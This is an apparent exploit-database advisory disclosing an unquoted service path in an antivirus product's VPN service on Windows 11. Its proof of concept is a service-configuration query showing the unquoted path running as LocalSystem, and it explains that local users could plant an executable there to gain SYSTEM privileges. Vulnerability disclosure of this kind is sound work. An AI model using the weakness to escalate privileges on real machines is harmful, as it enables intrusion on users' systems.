# Exploit Title: AVAST Antivirus 25.11 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Date: 2025-12-17
# Vendor Homepage:https://www.avast.com/
# Software Link :
https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
# Tested Version: 25.11
# Tested on OS: Windows 11
Description
AVAST Antivirus 25.11 an unquoted service path vulnerability that allows
local non-privileged users to potentially execute code with elevated SYSTEM
privileges. Attackers can exploit the unquoted service path configuration
to inject malicious executables that will be run with high-level system
permissions.
PoC
C:\>sc qc SecureLine
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SecureLine
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST
Software\SecureLine\VpnSvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Avast SecureLine
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystemCredits and Partners
All rights reserved nPulse.net 2009 - 2026
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
